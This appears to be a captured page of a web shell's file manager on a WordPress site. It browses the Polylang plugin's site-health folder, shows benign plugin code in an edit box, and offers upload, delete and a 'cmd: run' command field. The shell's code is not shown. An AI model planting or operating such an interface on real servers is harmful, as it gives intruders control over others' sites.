/
home
/
techb158
/
l2hypotheques.com
/
wp-content
/
plugins
/
polylang
/
src
/
modules
/
site-health
/
/home/techb158/l2hypotheques.com/wp-content/plugins/polylang/src/modules/site-health
mkdir
upload
Name
Size
Mode
Actions
admin-site-health.php
10968
0644
edit
dl
rm
load.php
278
0644
edit
dl
rm
Edit:
/home/techb158/l2hypotheques.com/wp-content/plugins/polylang/src/modules/site-health/load.php
(278B)
<?php /** * Loads the site health. * * @package Polylang */ if ( ! defined( 'ABSPATH' ) ) { exit; // Don't access directly. } if ( $polylang instanceof PLL_Admin && $polylang->model->has_languages() ) { $polylang->site_health = new PLL_Admin_Site_Health( $polylang ); }
Save
cmd:
run